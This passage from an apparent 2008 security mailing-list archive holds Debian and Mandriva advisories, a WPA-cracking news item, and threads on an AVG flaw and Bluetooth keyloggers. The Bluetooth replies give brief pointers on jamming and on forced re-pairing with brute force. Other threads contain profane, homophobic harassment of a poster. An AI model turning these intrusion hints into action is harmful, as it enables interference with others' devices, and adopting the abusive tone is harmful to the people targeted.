  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_mipsel.deb
    Size/MD5 checksum: 25846914 766bcfbde62e9f75fc09f8892b1f6095
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_mipsel.deb
    Size/MD5 checksum:  7563074 fb084ab6a02dcf12fde22c740d6d63ac
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_mipsel.deb
    Size/MD5 checksum:  7642196 c58f251badf84dd7527f6bcf74bc1846
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_mipsel.deb
    Size/MD5 checksum:    48174 92fe38d06aac7ca0a1ff1a26f5858704
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_mipsel.deb
    Size/MD5 checksum:  1789960 0864b73e16d14ed1776879d3ef2ab5c1

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_powerpc.deb
    Size/MD5 checksum:  7575148 351f97505dde5ce74808b38008a04d1f
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_powerpc.deb
    Size/MD5 checksum:  7513654 5d9f12246f363b4eaab281e6c37ccf48
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_powerpc.deb
    Size/MD5 checksum: 26169508 81c25c622b35bec7d709f8fef4b3ba03
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_powerpc.deb
    Size/MD5 checksum:    48174 43cdd4b621fa97e345162fb5a11c3321
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_powerpc.deb
    Size/MD5 checksum:  1833008 a031cdc91532615006e3433ea1a2b9cc

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_s390.deb
    Size/MD5 checksum:    48172 b15d4493389f2d371d933b3cfec9dbfa
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_s390.deb
    Size/MD5 checksum:  7508416 7950a277db319634c2a61162c531d9f8
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_s390.deb
    Size/MD5 checksum:  1952408 4035d4b30041b76cdad65f5093d0191e
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_s390.deb
    Size/MD5 checksum: 26765686 38ad49284aa88c6157c496f5583e81b4
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_s390.deb
    Size/MD5 checksum:  7414890 b61ee866d423474e4e76e68527d09b31

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch8_sparc.deb
    Size/MD5 checksum:  7159698 8ec6e96934ed76dbae21d28ebb701f02
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch8_sparc.deb
    Size/MD5 checksum: 25578698 e0cd9496cac89eb22ba854b3e10ca96b
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch8_sparc.deb
    Size/MD5 checksum:  7028544 fa58c135613be17bd723fea6c4f4de0d
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch8_sparc.deb
    Size/MD5 checksum:  1798226 b1a13379770a9b860a6328176c93eecd
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch8_sparc.deb
    Size/MD5 checksum:    48218 9e6c78e0ae63d91c3361ff106ca0d4a7


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJEmvqU5XKDemr/NIRAtjFAKD0b1I33j80Z6JworeVVlNHKuW4yQCfVusE
I5MOY2TVITMgVkkzs7IrQTw=
=5+yr
-----END PGP SIGNATURE-----



From tribalmp at gmail.com  Thu Nov  6 13:05:46 2008
From: tribalmp at gmail.com (Tribal MP)
Date: Thu, 6 Nov 2008 13:05:46 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
Message-ID: <40ca6f560811060505o3acde47dn33c9a6a962142604@mail.gmail.com>

@ alessandro telami
Most antivirus , nowadays locks there processesAVG 8.0.173 and older
doesn't. At the time, i'm writing this lines there are public
computers in my local area that can be used to infect.

Note: This is usefull for hack tools execution or pay-per-install schemes.

Note 2: An automatic POC with source is already made.



From Valdis.Kletnieks at vt.edu  Thu Nov  6 15:11:27 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 06 Nov 2008 10:11:27 -0500
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: Your message of "Thu, 06 Nov 2008 10:54:36 +0100."
	<a2e8ca0811060154n1ff36248q1c6a7f620ae49b1d@mail.gmail.com>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>
	<491280FB.3020100@kallisti.se>
	<a2e8ca0811060154n1ff36248q1c6a7f620ae49b1d@mail.gmail.com>
Message-ID: <12542.1225984287@turing-police.cc.vt.edu>

On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik H?jgaard said:

> And now he accidentally the entire fleshlight!

This sentence no verb.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/c37e8f11/attachment.bin 

From nytrokiss at gmail.com  Thu Nov  6 16:45:22 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Thu, 6 Nov 2008 18:45:22 +0200
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: <12542.1225984287@turing-police.cc.vt.edu>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>
	<491280FB.3020100@kallisti.se>
	<a2e8ca0811060154n1ff36248q1c6a7f620ae49b1d@mail.gmail.com>
	<12542.1225984287@turing-police.cc.vt.edu>
Message-ID: <8a6b8e350811060845q7010a5ebm4e8c2df1fc35c2d8@mail.gmail.com>

He isn't so bad have some mercy ;)

On 11/6/08, Valdis.Kletnieks at vt.edu <Valdis.Kletnieks at vt.edu> wrote:
> On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik H?jgaard said:
>
>> And now he accidentally the entire fleshlight!
>
> This sentence no verb.
>


-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/



From rholgstad at gmail.com  Thu Nov  6 17:47:01 2008
From: rholgstad at gmail.com (rholgstad)
Date: Thu, 06 Nov 2008 11:47:01 -0600
Subject: [Full-disclosure] Death of a Gay h4x0r!
In-Reply-To: <12542.1225984287@turing-police.cc.vt.edu>
References: <2c842d460811052058w18a79ac7i43edd42e5fcd9c13@mail.gmail.com>	<491280FB.3020100@kallisti.se>	<a2e8ca0811060154n1ff36248q1c6a7f620ae49b1d@mail.gmail.com>
	<12542.1225984287@turing-police.cc.vt.edu>
Message-ID: <49132D95.9090001@gmail.com>

you are showing your age... might be time for an internet exits

Valdis.Kletnieks at vt.edu wrote:
> On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik H?jgaard said:
>
>   
>> And now he accidentally the entire fleshlight!
>>     
>
> This sentence no verb.
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



From telami at hotmail.com  Thu Nov  6 17:49:51 2008
From: telami at hotmail.com (alessandro telami)
Date: Thu, 6 Nov 2008 17:49:51 +0000
Subject: [Full-disclosure] AVG 8.0.173 flaw
In-Reply-To: <40ca6f560811060505o3acde47dn33c9a6a962142604@mail.gmail.com>
References: <40ca6f560811060505o3acde47dn33c9a6a962142604@mail.gmail.com>
Message-ID: <BAY131-W34A25210C79F1AB53C6D4CD71E0@phx.gbl>


My point is/was that with that kind of privileges on the machine there is no point in killing the AV processes, when you
could just format the hard drive or do whatever you like on the machine.
> Date: Thu, 6 Nov 2008 13:05:46 +0000> From: tribalmp at gmail.com> To: full-disclosure at lists.grok.org.uk> Subject: [Full-disclosure] AVG 8.0.173 flaw> > @ alessandro telami> Most antivirus , nowadays locks there processesAVG 8.0.173 and older> doesn't. At the time, i'm writing this lines there are public> computers in my local area that can be used to infect.> > Note: This is usefull for hack tools execution or pay-per-install schemes.> > Note 2: An automatic POC with source is already made.> > _______________________________________________> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/
_________________________________________________________________
BigSnapSearch.com - 24 prizes a day, every day - Search Now!
http://clk.atdmt.com/UKM/go/117442309/direct/01/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/953fa4a2/attachment.html 

From shawnmer at gmail.com  Thu Nov  6 19:37:07 2008
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Thu, 6 Nov 2008 14:37:07 -0500
Subject: [Full-disclosure] Bluetooth keyloggers?
Message-ID: <fb0927a80811061137l2b832d33y1305fb251e8b5d43@mail.gmail.com>

Hi List,

Just wondering if anyone has technical feedback/musings on the
emerging bluetooth keyloggers available, such as the following
products:

1.  http://www.wirelesskeylogger.com/index.php
2.  http://www.keyear.com/articles_pages/BTKeyEar2.html
4.  Other commercially offered products?
3.  Any custom kit/gear folks have cooked up, and are willing to talk
about, brining to a conference, etc.?

Specifically I'm looking to find out more concerning these attributes:

* Remote discovery of these devices (active and passive) via
bluetooth, localhost device discovery, any other means, etc.
* Countermeasures, any and all, including isolated "jamming" and, if
feasible, control of data flow or "injection" of false data
* Fingerprinting (a la "Blueprinting" -
http://trifinite.org/trifinite_stuff_blueprinting.html)
* Real-world performance in light of interference (signal and obstacles)
* Any other "stuff" -- honeypots, long-distance snarfage, creative
applications, automation, etc. ;-)

Off list comments are fine too.

Cheers,
--scm



From michael.holstein at csuohio.edu  Thu Nov  6 20:39:53 2008
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Thu, 06 Nov 2008 15:39:53 -0500
Subject: [Full-disclosure] Bluetooth keyloggers?
In-Reply-To: <fb0927a80811061137l2b832d33y1305fb251e8b5d43@mail.gmail.com>
References: <fb0927a80811061137l2b832d33y1305fb251e8b5d43@mail.gmail.com>
Message-ID: <49135619.8040402@csuohio.edu>


> Just wondering if anyone has technical feedback/musings on the
> emerging bluetooth keyloggers available, such as the following
> products:
>   

Yeah .. use a USB keyboard ;)

> * Remote discovery of these devices (active and passive) via
> bluetooth, localhost device discovery, any other means, etc.
>   

Bluesniff can discover devices (including non-discoverable ones, if 
they're active) .. much like you can find wifi devices even if the SSID 
is hidden. Even though BT is encrypted, you can still see the frames at L2.

They can also be found the same way one find hidden 2.4ghz cameras .. 
using spectrum analyzers (I have an icom handheld that does this 
marginally well if you're close enough).

> * Countermeasures, any and all, including isolated "jamming" and, if
> feasible, control of data flow or "injection" of false data
>   

Well, if you're willing to throw the "Part B" rules out the window .. 
any broadband noise generator tuned to the appropriate frequency will 
work. Most of the cheap-o Chinese jammers for Cellphone/GPS are just a 
simple VCO and amplifier .. easy to tune into the appropriate band.

As for injection .. with the bluejacking tools you can force a 
re-pairing, and then bruteforce. Since the devices you link to are 
designed to be passive, I'd imagine they'd automatically re-pair (versus 
a phone, which would prompt the user to do something).

> * Real-world performance in light of interference (signal and obstacles)
>   

bluetooth dongle to my Samsung cellphone works ~20' in a typical office. 
Their statement about a "football field" is only true if you were 
actually in an open field.

> * Any other "stuff" -- honeypots, long-distance snarfage, creative
> applications, automation, etc. ;-)
>
>   

.. a 24db parabolic plus a bluetooth dongle modded for an external 
antenna can give you several hundred feet, easily.


Cheers,

Michael Holstein CISSP GCIA
Cleveland State University



From Thierry at Zoller.lu  Thu Nov  6 20:46:09 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 6 Nov 2008 21:46:09 +0100
Subject: [Full-disclosure] Bluetooth keyloggers?
In-Reply-To: <fb0927a80811061137l2b832d33y1305fb251e8b5d43@mail.gmail.com>
References: <fb0927a80811061137l2b832d33y1305fb251e8b5d43@mail.gmail.com>
Message-ID: <1778962366.20081106214609@Zoller.lu>


Hi,
SM> * Remote discovery of these devices (active and passive) via
SM> bluetooth, localhost device discovery, any other means, etc.
Passive detection is always possible
Active (as in scan(query) detection depends on keylogger setup - I would guess no

SM> * Countermeasures, any and all, including isolated "jamming" and, if
SM> feasible, control of data flow or "injection" of false data
Jamming is always possible, injection depends on protocol usage



-- 
http://secdev.zoller.lu
Thierry Zoller



From security at mandriva.com  Thu Nov  6 22:52:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 06 Nov 2008 15:52:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:226 ] ruby
Message-ID: <E1KyDhp-0000UV-Gb@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:226
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ruby
 Date    : November 6, 2008
 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A denial of service condition was found in Ruby's regular expression
 engine.  If a Ruby script tried to process a large amount of data
 via a regular expression, it could cause Ruby to enter an infinite
 loop and crash (CVE-2008-3443).
 
 A number of flaws were found in Ruby that could allow an attacker to
 create a carefully crafted script that could allow for the bypass of
 certain safe-level restrictions (CVE-2008-3655).
 
 A denial of service vulnerability was found in Ruby's HTTP server
 toolkit, WEBrick.  A remote attacker could send a specially-crafted
 HTTP request to a WEBrick server that would cause it to use an
 excessive amount of CPU time (CVE-2008-3656).
 
 An insufficient taintness check issue was found in Ruby's DL module,
 a module that provides direct access to the C language functions.
 This flaw could be used by an attacker to bypass intended safe-level
 restrictions by calling external C functions with the arguments from
 an untrusted tainted input (CVE-2008-3657).
 
 A denial of service condition in Ruby's XML document parsing module
 (REXML) could cause a Ruby application using the REXML module to use
 an excessive amount of CPU and memory via XML documents with large
 XML entitity definitions recursion (CVE-2008-3790).
 
 The Ruby DNS resolver library used predictable transaction IDs and
 a fixed source port when sending DNS requests.  This could be used
 by a remote attacker to spoof a malicious reply to a DNS query
 (CVE-2008-3905).
 
 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3443
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3655
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3657
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3790
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3905
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 b0f0593d07a6631aaa701924c6beacff  2008.0/i586/ruby-1.8.6-5.3mdv2008.0.i586.rpm
 7d914e909536c61b2ce0ad112229054c  2008.0/i586/ruby-devel-1.8.6-5.3mdv2008.0.i586.rpm
 35ab076f8519d913074acb3f8add7365  2008.0/i586/ruby-doc-1.8.6-5.3mdv2008.0.i586.rpm
 0e2b9e08dd9180b17391f0dc1d88bc64  2008.0/i586/ruby-tk-1.8.6-5.3mdv2008.0.i586.rpm 
 df8cd74ee6670f3f016c5e1b7912ba2a  2008.0/SRPMS/ruby-1.8.6-5.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 198e6e4c2ae919c066d900e1d44a8ea6  2008.0/x86_64/ruby-1.8.6-5.3mdv2008.0.x86_64.rpm
 fc7e8c154348d0921f0d2002f3ee0fa9  2008.0/x86_64/ruby-devel-1.8.6-5.3mdv2008.0.x86_64.rpm
 62027ed3409c5f56d7a07128246bdd7e  2008.0/x86_64/ruby-doc-1.8.6-5.3mdv2008.0.x86_64.rpm
 e624bee3bc855bbd2068b3c850601926  2008.0/x86_64/ruby-tk-1.8.6-5.3mdv2008.0.x86_64.rpm 
 df8cd74ee6670f3f016c5e1b7912ba2a  2008.0/SRPMS/ruby-1.8.6-5.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 f88546be7edc6f3801915cedd95fb1e0  2008.1/i586/ruby-1.8.6-9p114.2mdv2008.1.i586.rpm
 000b10c2fbb34006a7222b1af111a42a  2008.1/i586/ruby-devel-1.8.6-9p114.2mdv2008.1.i586.rpm
 3f84b7b9a3b7d293ae52464336bf7dc5  2008.1/i586/ruby-doc-1.8.6-9p114.2mdv2008.1.i586.rpm
 88d2ae0a40e5614cde80ba249ff6fef9  2008.1/i586/ruby-tk-1.8.6-9p114.2mdv2008.1.i586.rpm 
 eb601f21a3a04aaccd8fdd98f31c553e  2008.1/SRPMS/ruby-1.8.6-9p114.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 a372532439a737e65f2685855d3c9109  2008.1/x86_64/ruby-1.8.6-9p114.2mdv2008.1.x86_64.rpm
 7eaa8e8b04ad12d690f8e56fb90ada6f  2008.1/x86_64/ruby-devel-1.8.6-9p114.2mdv2008.1.x86_64.rpm
 2d81cd9c9f1998c0cc18a188740b022d  2008.1/x86_64/ruby-doc-1.8.6-9p114.2mdv2008.1.x86_64.rpm
 37bb46235a75babe11c37caa3e80169e  2008.1/x86_64/ruby-tk-1.8.6-9p114.2mdv2008.1.x86_64.rpm 
 eb601f21a3a04aaccd8fdd98f31c553e  2008.1/SRPMS/ruby-1.8.6-9p114.2mdv2008.1.src.rpm

 Corporate 3.0:
 e218f9c5549d5524a70fdc648be21766  corporate/3.0/i586/ruby-1.8.1-1.11.C30mdk.i586.rpm
 c414540664946e719205cc8ca4263564  corporate/3.0/i586/ruby-devel-1.8.1-1.11.C30mdk.i586.rpm
 34885696510659a992227caaffc7dbe2  corporate/3.0/i586/ruby-doc-1.8.1-1.11.C30mdk.i586.rpm
 f226fe7a6ed268c96cc7ebba82552288  corporate/3.0/i586/ruby-tk-1.8.1-1.11.C30mdk.i586.rpm 
 1dfa0afea4caf035cd5ada43178c2ca6  corporate/3.0/SRPMS/ruby-1.8.1-1.11.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c64d31b7335cd132cc55b5cc0e83b29e  corporate/3.0/x86_64/ruby-1.8.1-1.11.C30mdk.x86_64.rpm
 3cca31c2e518eb9500c6961ed3b63952  corporate/3.0/x86_64/ruby-devel-1.8.1-1.11.C30mdk.x86_64.rpm
 5e700cfbd59a963514bae93fb8d40dd7  corporate/3.0/x86_64/ruby-doc-1.8.1-1.11.C30mdk.x86_64.rpm
 9358cc3244596e812a85e5ccf4d46f7e  corporate/3.0/x86_64/ruby-tk-1.8.1-1.11.C30mdk.x86_64.rpm 
 1dfa0afea4caf035cd5ada43178c2ca6  corporate/3.0/SRPMS/ruby-1.8.1-1.11.C30mdk.src.rpm

 Corporate 4.0:
 ea4101b61511cbd99ec83ee7f9c4e45b  corporate/4.0/i586/ruby-1.8.2-7.8.20060mlcs4.i586.rpm
 b2390656cf0a64924b2f2f8447201f07  corporate/4.0/i586/ruby-devel-1.8.2-7.8.20060mlcs4.i586.rpm
 59ebdc2d52f835bbd0a30c06516e9188  corporate/4.0/i586/ruby-doc-1.8.2-7.8.20060mlcs4.i586.rpm
 a5d04af4072f84a0fcd02e8367a6e895  corporate/4.0/i586/ruby-tk-1.8.2-7.8.20060mlcs4.i586.rpm 
 ba2d3c2e6e80eb1a75beef6974dc4ce8  corporate/4.0/SRPMS/ruby-1.8.2-7.8.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 a3f6881a877878c369b44ebb7f4b19b6  corporate/4.0/x86_64/ruby-1.8.2-7.8.20060mlcs4.x86_64.rpm
 173d10379f418d0ff45250428f4afb0b  corporate/4.0/x86_64/ruby-devel-1.8.2-7.8.20060mlcs4.x86_64.rpm
 4ac867f94c8edb8f905d3cb5baa38a70  corporate/4.0/x86_64/ruby-doc-1.8.2-7.8.20060mlcs4.x86_64.rpm
 378b79e48075344eb0f4078e8a6a2b6b  corporate/4.0/x86_64/ruby-tk-1.8.2-7.8.20060mlcs4.x86_64.rpm 
 ba2d3c2e6e80eb1a75beef6974dc4ce8  corporate/4.0/SRPMS/ruby-1.8.2-7.8.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJE0cxmqjQ0CJFipgRApyNAJ4kNIoxQAwjj7P4+7Z59CADJSLfzACgpYct
0C/j0PQUiS/4p83mt2eyB7k=
=C3Tt
-----END PGP SIGNATURE-----



From ivanhec at gmail.com  Thu Nov  6 23:03:11 2008
From: ivanhec at gmail.com (Ivan .)
Date: Fri, 7 Nov 2008 10:03:11 +1100
Subject: [Full-disclosure] Once thought safe, WPA Wi-Fi encryption is cracked
Message-ID: <6450e99d0811061503k7bc99f24oe83955e87cd50960@mail.gmail.com>

To do this, Tews and his co-researcher Martin
Beck<http://www.computerworld.com/action/inform.do?command=search&searchTerms=Martin+Beck>found
a way to break the Temporal Key Integrity Protocol (TKIP) key, used by
WPA, in a relatively short amount of time: 12 to 15 minutes, according
to Dragos
Ruiu<http://www.computerworld.com/action/inform.do?command=search&searchTerms=Dragos+Ruiu>,
the PacSec conference's organizer.

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119258
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/1e03e7cb/attachment.html 

From xploitable at gmail.com  Thu Nov  6 23:48:06 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 6 Nov 2008 23:48:06 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
Message-ID: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>

On Thursday, Microsoft announced two security bulletins for Tuesday.
The advance notice is intended as a heads up for IT departments before
Patch Tuesday, the company's monthly patch day. One bulletin is
considered critical, the most serious ranking offered by the software
giant, while the other is ranked important, the next most serious.

The critical patch will affect XML Core Services in Windows and
Microsoft Office. The important bulletin will affect only Windows. If
exploited, Microsoft says the specific vulnerabilities addressed in
these bulletins could cause remote code execution.

http://news.cnet.com/8301-1009_3-10084063-83.html

i'm not sure this is a good idea as it gives a heads up to hackers.
you may think its not long but its actually 5 days for a hacker to
figure out potentially a vulnerability in said area. maybe we should
have a discussion about the pros and cons of these microsoft heads up
and what the reality of it is for the bad guys to be able to pin point
and start exploiting a flaw in said area in a 5 day time frame. yours
n3td3v.

-------

Helping keep you safe online -

Here you can join me to information share about what the real hackers
and bad hackers are upto.

http://groups.google.com/group/n3td3v



From biz.marqee at gmail.com  Fri Nov  7 00:10:47 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 11:10:47 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
Message-ID: <a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>

maybe we should have a discussion on what a drug addled cock lover you are?

On Fri, Nov 7, 2008 at 10:48 AM, n3td3v <xploitable at gmail.com> wrote:

> On Thursday, Microsoft announced two security bulletins for Tuesday.
> The advance notice is intended as a heads up for IT departments before
> Patch Tuesday, the company's monthly patch day. One bulletin is
> considered critical, the most serious ranking offered by the software
> giant, while the other is ranked important, the next most serious.
>
> The critical patch will affect XML Core Services in Windows and
> Microsoft Office. The important bulletin will affect only Windows. If
> exploited, Microsoft says the specific vulnerabilities addressed in
> these bulletins could cause remote code execution.
>
> http://news.cnet.com/8301-1009_3-10084063-83.html
>
> i'm not sure this is a good idea as it gives a heads up to hackers.
> you may think its not long but its actually 5 days for a hacker to
> figure out potentially a vulnerability in said area. maybe we should
> have a discussion about the pros and cons of these microsoft heads up
> and what the reality of it is for the bad guys to be able to pin point
> and start exploiting a flaw in said area in a 5 day time frame. yours
> n3td3v.
>
> -------
>
> Helping keep you safe online -
>
> Here you can join me to information share about what the real hackers
> and bad hackers are upto.
>
> http://groups.google.com/group/n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/cbf93cd4/attachment.html 

From waveroad at gmail.com  Fri Nov  7 00:14:35 2008
From: waveroad at gmail.com (waveroad waveroad)
Date: Thu, 6 Nov 2008 19:14:35 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <296a304a0811061603r4c19af18s6264b0c77b077e45@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<296a304a0811061603r4c19af18s6264b0c77b077e45@mail.gmail.com>
Message-ID: <296a304a0811061614w2f976c64qa3f07bf3de88e5e@mail.gmail.com>

Shut the fuck up
We're tired to hear your shit dude.
Why don't you just keep on squatting your fucking mailing list with your
friends ?

You have no friends here, and you're not welcome, get the fuck out of here.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/8ce322cb/attachment.html 

From xploitable at gmail.com  Fri Nov  7 00:31:23 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 00:31:23 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
Message-ID: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>

blackhats like you will always hate on me, so i just ignore the
negative responses i get.



From waveroad at gmail.com  Fri Nov  7 00:40:02 2008
From: waveroad at gmail.com (waveroad waveroad)
Date: Thu, 6 Nov 2008 19:40:02 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
Message-ID: <296a304a0811061640h55fb6fabx67df0b91a17c66b4@mail.gmail.com>

That's a good try, you play the oppressed card, Calimero sayed it: life is
so injust.
To bad that's not the real reason.
You're polluating this mailing list since a couple of years, there's even a
profiling Pdf dedicated to you (amnesic reminder:
www.hackerfactor.com/papers/who_is_n3td3v.pdf)

now it's enough, it's not a question about white/grey/blue/black hat, it's
about a fucking morron named n3td3v.

So please consider my past advice :
Get The Fuck Out Of Here ,you have no friends here.







2008/11/6, n3td3v <xploitable at gmail.com>:
>
> blackhats like you will always hate on me, so i just ignore the
> negative responses i get.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/68098006/attachment.html 

From biz.marqee at gmail.com  Fri Nov  7 00:48:14 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 11:48:14 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
Message-ID: <a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>

Do you even understand why people dont like you? It is because you have all
these crackpot ideas but no experience to back it up. All your ideas only
make sense from a theoretical standpoint, but in practicality most will
fail.

Do you understand that or are you much of an ignorant person to even realise
that you are a joke to us. I will say that again just incase you missed it
YOU ARE A JOKE.

